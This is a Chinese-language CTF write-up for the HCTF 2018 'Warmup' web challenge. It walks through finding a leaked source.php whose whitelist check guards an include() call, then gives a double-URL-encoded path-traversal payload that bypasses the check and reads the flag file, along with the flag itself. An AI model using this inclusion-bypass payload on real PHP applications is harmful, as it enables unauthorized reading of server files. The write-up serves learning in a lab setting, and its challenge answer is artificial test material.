难度系数: ★★
题目来源: HCTF
题目描述: 暂无
题目场景: http://220.249.52.133:38343 (温馨提示:每次进入URL的端口号都不一样)

1、点击链接进入如下界面

2、查看源代码(按F12或F12+Fn),出现以下代码。

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="ie=edge"><title>Document</title>
</head>
<body><!--source.php--><br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>

3、发现了“source.php”

则在链接后面加上“/source.php”

既是http://220.249.52.133:38343/source.php

4、输入URL之后,跳出以下信息

<?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}
?>

5、发现了关键信息

$whitelist = [“source”=>“source.php”,“hint”=>“hint.php”];

6、在链接后加上/hint.php

URL: http://220.249.52.133:38343/hint.php

7、输入URL,出现以下信息


8、然后构造payload

?file=source.php%253f/../../../../ffffllllaaaagggg
URL: http://220.249.52.133:38343/source.php?file=source.php%253f/../../../../ffffllllaaaagggg

这样也可以,等等!

9、找到flag


10、OK

flag{25e7bce6005c4e0c983fb97297ac6e5a}

CTF warmup相关推荐

  1. CTF(pwn)攻防世界warmup

    题目描述 这种题很有意思,只给了题目场景地址没有文件,让你盲打,类似于web中的盲注吧; nc连接,给了 目标地址, 思路是:利用栈溢出覆盖,返回这个地址; 具体是溢出多少是不确定的,是P64(),还 ...

  2. [原题复现]HCTF 2018 Warmup

    HCTF 2018 Warmup 原题复现:https://gitee.com/xiaohua1998/hctf_2018_warmup 考察知识点:文件包含漏洞(phpmyadmin 4.8.1任意 ...

  3. CSAW CTF 2016 PWN quals-warmup

    CSAW CTF 2016 PWN quals-warmup 原文链接 先对文件有个大致的了解,是64位ELF文件 ☁ csaw ctf 2016 quals-warmup ls exp.py fla ...

  4. 从0到1的CTF之旅————Web(1)

    今天学习了一下web感觉受益匪浅,小做几道题练练手,纯新手勿喷 -------------------------------------------- 第一题:[极客大挑战 2019]EasySQL ...

  5. CTF之MISC练习二

    一.base16解密 题目名称:base64÷4 题目附件: https://adworld.xctf.org.cn/media/task/attachments/c8cb2b557b57475d8e ...

  6. CTF密码学总结(二)

    目录 CTF 密码学总结 题目类型总结: 简单密码类型: 复杂密码类型: 文件相关类型: 算法类总结: 密码学脚本类总结: 单独的密文类型(优先使用ciphey工具) 多层传统加密混合: Bugku的 ...

  7. CTF密码学部分知识总结(一)

    目录 openssl 解密RSA一般步骤 1.凯撒密码(Caesar) 2.摩斯密码在线解密 3.unicode在线解码 4.栅栏密码在线解密 5.培根密码在线解密 6.python反编译工具unco ...

  8. CTF 中RSA的常见解析

    0x01 前言 这里就不讨论数论的基础了,进行RSA的题目解答,至少要懂得基本的数论知识的,如果不了解数论的基本知识的话,网上相关内容还是挺多的. RSA基于一个简单的数论事实,两个大素数相乘十分容易 ...

  9. [ CTF ] WriteUp- 20221003 CTFShow新(脑洞)手(套路)杯

    目录 [Misc]哇库哇库 [Misc]显卡坏了 赛后看官方wp给的脚本: [Web]easy_eval [Web]repairman [Crypto]easy_base [Crypto]天知地知(赛 ...

  10. [cryptoverse CTF 2023] crypto部分

    没打,完事作作题. Warmup 1 Decode the following ciphertext: GmvfHt8Kvq16282R6ej3o4A9Pp6MsN. Remember: CyberC ...

最新文章

  1. 数据库期末复习之事务与数据恢复
  2. 【多标签文本分类】融合CNN-SAM与GAT的多标签文本分类模型
  3. SQL like 模糊查询
  4. 用Spring Cloud Alibaba开发微服务会更香吗?
  5. html中英文混排,EndNote中英文混排时et al和等的3种解决方法 | 科研动力
  6. 特斯拉:已在中国建立数据中心,以实现数据存储本地化
  7. postgresql10.5安装
  8. 如何成为一名大厂的优秀员工?
  9. javaweb和ajax使用查询出来的数据做下拉菜单_区块链浏览器实用指南篇:利用链上数据把握减半行情...
  10. UED、UCD、UE、UI、交互设计概念
  11. ORA-01476: divisor is equal to zero解决方法
  12. Discuz!X/数据库操作方法
  13. mysql年龄数据类型_MySql 数据类型
  14. 身份证前6位城市代码
  15. python绘制网络拓扑图_python 画网络拓扑图
  16. ArcMap下停靠栏的设计与实现
  17. JavaScript的全局作用域、全局对象window
  18. 研究生浑浑噩噩的一天
  19. 算法笔记——15个瓶子,4只老鼠,测试哪瓶有毒
  20. andt-pro:搭建一个ant-design-pro项目(模板)

热门文章

  1. 为什么「计件工资」的管理需要数字化?这家企业用实践解答
  2. iOS - 毛玻璃效果
  3. 散户通过a股量化数据接口实现自动化实盘交易主要方式有哪些?
  4. 计算机打字速度在线测试,在线测试打字速度(一分钟打字速度测试)
  5. 2018-08-14云兴维智电话面试总结
  6. 【操作系统】 2.2 调度概念以及调度算法
  7. 机器学习全系列经典书籍推荐
  8. oracle 创建cdb,Oracle 12C -- 手动创建CDB
  9. 设计一个高性能三维渲染服务器,最强大脑-CATIA飞机协同设计制造工作站配置方案2016...
  10. java 实现jpg、png、tif、gif 任意图像格式转换(多页tif合并)